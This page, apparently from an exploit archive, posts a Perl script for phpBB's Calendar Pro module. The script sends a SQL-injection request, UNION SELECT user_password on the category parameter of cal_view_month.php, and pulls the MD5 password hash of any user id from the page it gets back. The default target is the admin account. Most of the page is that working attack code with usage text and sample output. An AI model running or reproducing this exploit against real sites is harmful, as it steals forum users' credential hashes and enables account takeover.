what you don't know can hurt you

cal_phpbb.pl.txt

cal_phpbb.pl.txt
Posted Apr 17, 2005
Authored by Axl, CereBrums

phpBB versions 2.0.13 and below Calendar Pro module exploit that retrieves a users md5 hash.

tags | exploit
MD5 | 6a81916759b29655f8eae0e7eb1c6be3

cal_phpbb.pl.txt

Change Mirror Download
#!/usr/bin/perl -w
use IO::Socket;

## Example:
## C:\>cal_phpbb.pl www.site.com /phpBB2/ 2
##
## 'Calendar Pro' Mod for phpBB
## *************************
## [~] Connecting...
## [+] Connected!
## [~] Sending Data...
## [~] Data Sent, Waiting for response...
## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " 'Calendar Pro' Mod <= 2.0.33 (Newest version) For phpBB\n";
print " Bug found by Axl\n";
print " Coded by CereBrums // 4/4/2005\n";
print " Usage: cal_phpbb.pl <server> <folder> <user_id>\n";
print " e.g.: cal_phpbb.pl www.site.com /phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 is default for phpBB admin) \n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

$take = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n 'Calendar Pro' Mod for phpBB\n";
print " *****************************\n";
print " [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print " [+] Connected!\n";
print " [~] Sending Data...\n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0\r\n\r\n";

print " [~] Data Sent, Waiting for response...\n";

while ($answer = <$socket>)
{
if ($take == 1) {
$in = rindex ($answer, "(");
if ( $in > -1 ) {
$pass = substr($answer,$in+1,32);
print " [+] MD5 Hash for user with id=$user_id is: $pass\n";
exit();
}
}
if ( rindex ($answer,"cal_view_month.php?month=3&year=2005") > -1 ) {
$take = 1;
}
}
print " [-] Exploit failed\n";
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close